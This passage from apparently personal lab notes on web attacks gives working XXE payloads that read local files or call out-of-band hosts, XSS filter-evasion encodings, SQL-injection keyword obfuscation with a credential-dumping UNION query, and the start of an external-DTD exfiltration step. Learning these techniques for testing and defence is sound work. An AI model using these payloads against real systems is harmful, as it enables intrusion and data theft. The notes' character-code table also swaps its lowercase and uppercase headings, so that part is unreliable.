</code></pre><p id="353f25c0-1816-4ede-a600-7b18f44a010d" class=""><strong>This request sends the form data (</strong><code><strong>foo=bar</strong></code><strong>) encoded in a standard URL-encoded format.</strong></p><h3 id="7e60aebb-54d1-415e-a1e6-63378b629ca3" class="">Modified Request (XML content type)</h3><p id="b55dab1d-4516-4cb9-ba1d-827ad76ce9a8" class=""><mark class="highlight-teal_background"><strong>To exploit XXE vulnerabilities, you change the content type to </strong></mark><mark class="highlight-teal_background"><code><strong>text/xml</strong></code></mark><mark class="highlight-teal_background"><strong> and structure the request body as XML:</strong></mark></p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="4205e70f-984c-4bdf-9720-9b263de61ac3" class="code"><code class="language-Nix" style="white-space:pre-wrap;word-break:break-all">POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52

&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;&lt;foo&gt;bar&lt;/foo&gt;</code></pre><p id="96f3df9d-7938-4d72-b658-5a76fbde4692" class=""><strong>If the application processes this XML correctly, you can use this method to inject malicious XML content.</strong></p><h3 id="9e677836-e9f7-44aa-a0d8-45ec7defcfe6" class="">Exploiting XXE</h3><p id="2cfe297d-3984-4450-9bac-bf01c8468b29" class=""><strong>Now, let&#x27;s take this a step further by crafting an XML payload that includes an XXE attack. Here&#x27;s how you can do this:</strong></p><h3 id="7bb9e473-6814-4870-b865-8d649c5571ec" class="">Example: Injecting an XXE Payload</h3><ol type="1" id="811a6189-617c-42dd-9fca-5e18f53cbc01" class="numbered-list" start="1"><li><strong>Original Request</strong>:</li></ol><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="900ae3fb-2559-449e-8274-25405cd81621" class="code"><code class="language-Nix">POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

foo=bar</code></pre><p id="70f21c30-aceb-4ef4-ab8c-93f61fc1bfe6" class=""><strong>Modified Request with XXE Payload</strong>:</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="af2cc39a-77e6-4600-a7e7-fb6e234fa99b" class="code"><code class="language-Plain Text" style="white-space:pre-wrap;word-break:break-all">POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 186

&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM &quot;file:///etc/hostname&quot;&gt; ]&gt;
&lt;foo&gt;&amp;xxe;&lt;/foo&gt;</code></pre><p id="51e37421-da16-4908-9a0e-5634769a4f66" class="">
</p><h1 id="f02e4fe8-7309-4dbb-80e3-c2393c6ddbcb" class=""><mark class="highlight-brown_background"><strong><span style="border-bottom:0.05em solid">A. Obfuscation via XML encoding</span></strong></mark></h1><p id="ce760cfd-e5e2-48ec-85ce-1406c3f142d0" class=""><strong>SQL injection with filter bypass via XML encoding:</strong></p><p id="ad919395-1b45-4767-afbd-edc541ee8d7d" class=""><strong>payload&gt; </strong><code><strong>UNION SELECT username || &#x27;~&#x27; || password FROM users</strong></code></p><p id="548df190-27c2-4a11-a0ca-c14c88101135" class=""><mark class="highlight-yellow"><strong>Waf bypass</strong></mark><strong>&gt; <br/>using the <br/></strong><strong><a href="https://portswigger.net/bappstore/65033cbd2c344fbabe57ac060b5dd100">Hackvertor</a></strong><strong> extension. Just highlight my input, right-click, then select Extensions &gt; Hackvertor &gt; Encode &gt; dec_entities/hex_entities.   </strong>            </p><figure id="c184531e-52ab-4f00-b1e9-b0fe527485cb" class="image" style="text-align:left"><a href="Untitled%205.jpeg"><img style="width:624px" src="Untitled%205.jpeg"/></a></figure><p id="13712cf6-5cca-4e4f-a393-28fc4e221096" class="">
</p><h2 id="eec73c37-cd4b-48ea-af47-27140813b427" class=""><mark class="highlight-brown_background"><span style="border-bottom:0.05em solid">B. Obfuscation via unicode escaping</span></mark></h2><p id="7bf8deb2-7c33-43a6-8ed6-8bb1463cca56" class=""><strong>Unicode escape sequences consist of the prefix </strong><code><strong>\u</strong></code><strong> followed by the four-digit hex code for the character. For example, </strong><code><strong>\u003a</strong></code><strong>. or</strong><br/><br/><strong>curly braces:</strong> <code>\u{3a}</code></p><p id="efeb11d8-5466-46f1-a1d5-c29d7c79c1d7" class=""><mark class="highlight-red"><strong><a href="https://portswigger.net/web-security/cross-site-scripting/dom-based">DOM XSS</a></strong></mark><mark class="highlight-red"><strong> where your input is passed to the </strong></mark><mark class="highlight-red"><code><strong>eval()</strong></code></mark><mark class="highlight-red"><strong> sink as a string. </strong></mark>escaping one of the characters as follows:</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="559ebef0-5212-4f03-ac4f-ae933e85a0f0" class="code"><code class="language-Plain Text" style="white-space:pre-wrap;word-break:break-all">eval(&quot;\u0061lert(1)&quot;)</code></pre><p id="dc393d4c-53f0-4a7f-a6d8-244643e421e6" class=""><strong><span style="border-bottom:0.05em solid">so some WAFs may be easily fooled using the same technique </span></strong></p><p id="a3f0d8e5-9b8b-43ea-8485-dc9e398c1227" class=""><mark class="highlight-red"><strong>For example:</strong></mark></p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="411ea2e8-fba4-4b57-9795-f15304c42976" class="code"><code class="language-Plain Text" style="white-space:pre-wrap;word-break:break-all">&lt;a href=&quot;javascript:\u{00000000061}alert(1)&quot;&gt;Click me&lt;/a&gt;</code></pre><p id="3bbbf0f5-d162-4bfa-a0c4-90925679393b" class="">
</p><h1 id="cc771686-6cc7-4a33-9453-fa1f5d095419" class=""><mark class="highlight-brown_background"><strong>C. Obfuscation via hex escaping</strong></mark></h1><p id="a393f99c-fe3a-40e4-94ec-7cb9ea29eec1" class=""><br/><br/><strong>hexadecimal code point, prefixed with </strong><code><strong>\x</strong></code><strong>. For example, the lowercase letter </strong><code><strong>a</strong></code><strong> is represented by </strong><code><strong>\x61</strong></code></p><p id="72dae222-233f-4d83-8025-a251c977c60f" class=""><mark class="highlight-yellow"><strong>Just like unicode escapes, these will be decoded client-side as long as the input is evaluated as a string:</strong></mark></p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="d7815984-d347-48d9-bfe1-4fc26d40aba1" class="code"><code class="language-Plain Text" style="white-space:pre-wrap;word-break:break-all">eval(&quot;\x61lert&quot;)</code></pre><p id="f17faf5e-9883-4001-8d22-e395081476e2" class=""><strong>we can sometimes also obfuscate SQL statements in a similar manner using the prefix </strong><code><strong>0x</strong></code><strong>. For example, </strong><code><strong>0x53454c454354</strong></code><strong> may be decoded to form the </strong><code><strong>SELECT</strong></code><strong> keyword.</strong></p><p id="8670178f-3960-4f9c-9153-eb913230b00d" class="">
</p><h2 id="49520127-fc56-46d1-914e-f9200215d81a" class=""><mark class="highlight-brown_background"><strong>D. Obfuscation via octal escaping</strong></mark></h2><p id="e7e0e68a-33fe-431e-b462-780b2d104464" class=""><strong>Octal escaping works in pretty much the same way as hex escaping, except that the character references use a base-8 numbering system rather than base-16. These are prefixed with a standalone backslash, meaning that the lowercase letter </strong><code><strong>a</strong></code><strong> is represented by </strong><code><strong>\141</strong></code><strong>.</strong></p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="bb72089a-955c-4562-b27f-05c9ae083090" class="code"><code class="language-Plain Text" style="white-space:pre-wrap;word-break:break-all">eval(&quot;\141lert(1)&quot;)</code></pre><h2 id="769feced-2ddb-4ab8-ae73-66a44573832c" class=""><mark class="highlight-brown_background"><strong>E. Obfuscation via multiple encodings</strong></mark></h2><p id="1d48046a-6188-46b7-8938-c9b2b191e892" class=""><strong>It is important to note that you can combine encodings to <br/>hide your payloads behind multiple layers of obfuscation. Look at the <br/></strong><code><strong>javascript:</strong></code><strong> URL in the following example:</strong></p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="2c6ca9aa-3493-4cc3-9df1-d6e6a2f704d9" class="code"><code class="language-Plain Text" style="white-space:pre-wrap;word-break:break-all">&lt;a href=&quot;javascript:&amp;bsol;u0061lert(1)&quot;&gt;Click me&lt;/a&gt;</code></pre><p id="d126866e-9604-4c3e-94f3-4f35ebdb1019" class=""><strong>Browsers will first HTML decode </strong><code><strong>&amp;bsol;,</strong></code><strong> resulting in a backslash. This has the effect of turning the otherwise arbitrary </strong><code><strong>u0061</strong></code><strong> characters into the unicode escape </strong><code><strong>\u0061</strong></code><strong>:</strong></p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="712039ea-ff18-4873-9d4d-24034db2a16e" class="code"><code class="language-Plain Text" style="white-space:pre-wrap;word-break:break-all">&lt;a href=&quot;javascript:\u0061lert(1)&quot;&gt;Click me&lt;/a&gt;</code></pre><p id="54eb1702-00bd-4273-90e4-4cd94b902f70" class=""><strong>This is then decoded further to form a functioning XSS payload:</strong></p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="28feb4f7-f042-4678-b7f9-ab35d31828b8" class="code"><code class="language-Plain Text" style="white-space:pre-wrap;word-break:break-all">&lt;a href=&quot;javascript:alert(1)&quot;&gt;Click me&lt;/a&gt;</code></pre><p id="04854f23-529c-4668-8671-7c523e035835" class=""><strong>Clearly, to successfully inject a payload in this way, you need a solid understanding of which decoding is performed on your input and in what order.</strong></p><p id="819e5ec9-9a56-4ada-baa6-a68676a264d6" class="">
</p><h2 id="c11c0365-e248-4006-85b2-d03ec1077d89" class=""><mark class="highlight-brown_background">Obfuscation via the SQL CHAR() function</mark></h2><p id="23557453-561d-45b0-8903-d21c736fbf76" class=""><strong>Although not strictly a form of encoding, in some cases, you<br/> may be able to obfuscate your SQL injection attacks using the <br/></strong><code><strong>CHAR()</strong></code><strong>function. This accepts a single decimal or hex code point and returns the matching character. Hex codes must be prefixed with </strong><code><strong>0x</strong></code><strong>. For example, both </strong><code><strong>CHAR(83)</strong></code><strong> and </strong><code><strong>CHAR(0x53)</strong></code><strong> return the capital letter </strong><code><strong>S</strong></code><strong>.</strong></p><p id="a6db3c46-ca56-40c4-a63f-1ebdf91d708f" class=""><strong>By concatenating the returned values, you can use this approach to obfuscate blocked keywords. For example, even if </strong><code><strong>SELECT</strong></code><strong> is blacklisted, the following injection initially appears harmless:</strong></p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="d30da04b-69d7-47f9-af45-857f5955b04c" class="code"><code class="language-Plain Text" style="white-space:pre-wrap;word-break:break-all">CHAR(83)+CHAR(69)+CHAR(76)+CHAR(69)+CHAR(67)+CHAR(84)</code></pre><p id="788c68e0-212f-4b10-b813-e969bf78a2ae" class=""><strong>The expression CHAR(83)+CHAR(69)+CHAR(76)+CHAR(69)+CHAR(67)+CHAR(84) represents a sequence of ASCII codes converted into their corresponding characters and then concatenated. The ASCII values provided correspond to the following characters:</strong></p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="9223c93e-4803-467d-a732-7ebf027f81eb" class="code"><code class="language-Plain Text" style="white-space:pre-wrap;word-break:break-all">CHAR(83) -&gt; &#x27;S&#x27;
CHAR(69) -&gt; &#x27;E&#x27;
CHAR(76) -&gt; &#x27;L&#x27;
CHAR(69) -&gt; &#x27;E&#x27;
CHAR(67) -&gt; &#x27;C&#x27;
CHAR(84) -&gt; &#x27;T&#x27;
</code></pre><p id="1a91dea2-11e6-4d8b-8554-4a23118f7f68" class=""><strong>Concatenating these characters results in the string &quot;SELECT</strong></p><h3 id="46cc43fb-08f9-4508-b0be-8cc8a7173548" class=""></h3><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="cb4b84bf-27cc-41ea-be1e-c5d0b081c0d0" class="code"><code class="language-PHP" style="white-space:pre-wrap;word-break:break-all">Lowercase Letter                
..................                        
CHAR(97) -&gt; &#x27;a&#x27;                  
CHAR(66) -&gt; &#x27;B&#x27;                   
CHAR(67) -&gt; &#x27;C&#x27;
CHAR(68) -&gt; &#x27;D&#x27;
CHAR(69) -&gt; &#x27;E&#x27;
CHAR(70) -&gt; &#x27;F&#x27;
CHAR(71) -&gt; &#x27;G&#x27;
CHAR(72) -&gt; &#x27;H&#x27;
CHAR(73) -&gt; &#x27;I&#x27;
CHAR(74) -&gt; &#x27;J&#x27;
CHAR(75) -&gt; &#x27;K&#x27;
CHAR(76) -&gt; &#x27;L&#x27;
CHAR(77) -&gt; &#x27;M&#x27;
CHAR(78) -&gt; &#x27;N&#x27;
CHAR(79) -&gt; &#x27;O&#x27;
CHAR(80) -&gt; &#x27;P&#x27;
CHAR(81) -&gt; &#x27;Q&#x27;
CHAR(82) -&gt; &#x27;R&#x27;
CHAR(83) -&gt; &#x27;S&#x27;
CHAR(84) -&gt; &#x27;T&#x27;
CHAR(85) -&gt; &#x27;U&#x27;
CHAR(86) -&gt; &#x27;V&#x27;
CHAR(87) -&gt; &#x27;W&#x27;
CHAR(88) -&gt; &#x27;X&#x27;
CHAR(89) -&gt; &#x27;Y&#x27;
CHAR(90) -&gt; &#x27;Z&#x27;   

Uppercase Letters:
....................
CHAR(65) -&gt; &#x27;A&#x27; 
CHAR(98) -&gt; &#x27;b&#x27;
CHAR(99) -&gt; &#x27;c&#x27;
CHAR(100) -&gt; &#x27;d&#x27;
CHAR(101) -&gt; &#x27;e&#x27;
CHAR(102) -&gt; &#x27;f&#x27;
CHAR(103) -&gt; &#x27;g&#x27;
CHAR(104) -&gt; &#x27;h&#x27;
CHAR(105) -&gt; &#x27;i&#x27;
CHAR(106) -&gt; &#x27;j&#x27;
CHAR(107) -&gt; &#x27;k&#x27;
CHAR(108) -&gt; &#x27;l&#x27;
CHAR(109) -&gt; &#x27;m&#x27;
CHAR(110) -&gt; &#x27;n&#x27;
CHAR(111) -&gt; &#x27;o&#x27;
CHAR(112) -&gt; &#x27;p&#x27;
CHAR(113) -&gt; &#x27;q&#x27;
CHAR(114) -&gt; &#x27;r&#x27;
CHAR(115) -&gt; &#x27;s&#x27;
CHAR(116) -&gt; &#x27;t&#x27;
CHAR(117) -&gt; &#x27;u&#x27;
CHAR(118) -&gt; &#x27;v&#x27;
CHAR(119) -&gt; &#x27;w&#x27;
CHAR(120) -&gt; &#x27;x&#x27;
CHAR(121) -&gt; &#x27;y&#x27;
CHAR(122) -&gt; &#x27;z&#x27;

Digits:
CHAR(48) -&gt; &#x27;0&#x27;
CHAR(49) -&gt; &#x27;1&#x27;
CHAR(50) -&gt; &#x27;2&#x27;
CHAR(51) -&gt; &#x27;3&#x27;
CHAR(52) -&gt; &#x27;4&#x27;
CHAR(53) -&gt; &#x27;5&#x27;
CHAR(54) -&gt; &#x27;6&#x27;
CHAR(55) -&gt; &#x27;7&#x27;
CHAR(56) -&gt; &#x27;8&#x27;
CHAR(57) -&gt; &#x27;9&#x27;

Common Special Characters:

CHAR(32) -&gt; &#x27; &#x27; (space)
CHAR(33) -&gt; &#x27;!&#x27;
CHAR(34) -&gt; &#x27;&quot;&#x27;
CHAR(35) -&gt; &#x27;#&#x27;
CHAR(36) -&gt; &#x27;$&#x27;
CHAR(37) -&gt; &#x27;%&#x27;
CHAR(38) -&gt; &#x27;&amp;&#x27;
CHAR(39) -&gt; &quot;&#x27;&quot;
CHAR(40) -&gt; &#x27;(&#x27;
CHAR(41) -&gt; &#x27;)&#x27;
CHAR(42) -&gt; &#x27;*&#x27;
CHAR(43) -&gt; &#x27;+&#x27;
CHAR(44) -&gt; &#x27;,&#x27;
CHAR(45) -&gt; &#x27;-&#x27;
CHAR(46) -&gt; &#x27;.&#x27;
CHAR(47) -&gt; &#x27;/&#x27;
CHAR(58) -&gt; &#x27;:&#x27;
CHAR(59) -&gt; &#x27;;&#x27;
CHAR(60) -&gt; &#x27;&lt;&#x27;
CHAR(61) -&gt; &#x27;=&#x27;
CHAR(62) -&gt; &#x27;&gt;&#x27;
CHAR(63) -&gt; &#x27;?&#x27;
CHAR(64) -&gt; &#x27;@&#x27;
CHAR(91) -&gt; &#x27;[&#x27;
CHAR(92) -&gt; &#x27;\&#x27;
CHAR(93) -&gt; &#x27;]&#x27;
CHAR(94) -&gt; &#x27;^&#x27;
CHAR(95) -&gt; &#x27;_&#x27;
CHAR(96) -&gt; &#x27;`&#x27;
CHAR(123) -&gt; &#x27;{&#x27;
CHAR(124) -&gt; &#x27;|&#x27;
CHAR(125) -&gt; &#x27;}&#x27;
CHAR(126) -&gt; &#x27;~&#x27;</code></pre><p id="e437aade-e81d-4d90-908a-4ec0d2c3beaf" class="">
</p><p id="a546d56f-cba9-4545-b4fe-a0960ee281fd" class="">
</p><h2 id="482243a6-c835-4f27-b075-064962d54098" class=""><mark class="highlight-brown_background">6- </mark><mark class="highlight-brown_background"><strong>Blind XXE with out-of-band interaction</strong></mark></h2><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="cba484a1-1ecd-4987-ac40-13dc52c58869" class="code"><code class="language-Bash">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;!DOCTYPE stockCheck [ &lt;!ENTITY xxe SYSTEM &quot;http://cqmgoi0ajl56l851heughphqrtjfwqwyj.oast.pro&quot;&gt; ]&gt;
&lt;stockCheck&gt;
&lt;productId&gt;&amp;xxe;&lt;/productId&gt;
&lt;storeId&gt;1&lt;/storeId&gt;
&lt;/stockCheck&gt;</code></pre><p id="45155fda-b2fa-46d0-898a-035bcfad0f28" class="">
</p><figure id="b40ffefa-4241-49dd-b52f-46419bdffd62" class="image"><a href="Untitled.png"><img style="width:707.9833374023438px" src="Untitled.png"/></a></figure><p id="edcc9cae-055a-48e3-bcd0-143c7c1d45a3" class=""><mark class="highlight-orange">And after i send the request i should check my collaborator for interaction with external DOMAIN.</mark></p><p id="b9f614e0-951e-4b22-8944-52acb8ab9914" class="">
</p><h2 id="b231ad44-9649-4be4-bdb1-c14d55a47087" class=""><mark class="highlight-brown_background"><strong>7- Blind XXE with out-of-band interaction via XML parameter entities</strong></mark></h2><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="fccd3710-98b1-4dd8-8ddc-9b915947bcf1" class="code"><code class="language-Bash">&lt;!DOCTYPE stockCheck [&lt;!ENTITY % xxe SYSTEM &quot;http://BURP-COLLABORATOR-SUBDOMAIN&quot;&gt; %xxe; ]&gt;</code></pre><p id="ec3dc778-51ea-4bfd-8189-55af7c440d8a" class="">
</p><figure id="6b3ca1b7-dd84-4be0-8252-101a5b2d102b" class="image"><a href="Untitled%201.png"><img style="width:708.0166625976562px" src="Untitled%201.png"/></a></figure><p id="50002179-ab41-4d4a-bd0e-8f4fb70d4ae2" class=""><strong>&quot;WhatEver&quot; feature that parses XML input, but does not display any unexpected values,</strong><mark class="highlight-red"><strong> and blocks requests containing regular external entities.</strong></mark></p><p id="fd2abb16-f72d-462b-be1b-08fd655747de" class=""><strong>We should, use a</strong><mark class="highlight-red"><strong> parameter entity</strong></mark><strong> to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator. Like example Bellow →</strong></p><figure id="58206685-3689-4780-8dbf-a31fe111218f" class="image" style="text-align:left"><a href="Untitled%202.png"><img style="width:672px" src="Untitled%202.png"/></a></figure><p id="4d3c3a9f-b7e3-4fe3-b4b9-03fbe3f3f819" class=""><mark class="highlight-purple"><strong>And after i send the request i should check my collaborator for interaction with external DOMAIN.</strong></mark></p><p id="f25fa52a-b7f2-44a2-a498-290c37b3271b" class="">
</p><h1 id="a916eca1-392c-4f25-8e77-fc29139e12a0" class=""><mark class="highlight-brown_background"><strong>8- Exploiting blind XXE to exfiltrate data using a malicious external DTD</strong></mark></h1><p id="aa809ef7-9e12-4df1-a9b7-b1f5f65e28cd" class="">&quot;Whatever&quot; feature that parses XML input but does not display the result.</p><p id="fbaee0b4-861c-40ad-84dc-e0eb8e7f2ddc" class="">we can, exfiltrate the contents of the <code>/etc/hostname</code> file.</p><ul id="ae36d586-09f5-4c82-bce8-5567c623dacf" class="bulleted-list"><li style="list-style-type:disc">Place the Burp Collaborator payload into a malicious DTD file: </li></ul><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" 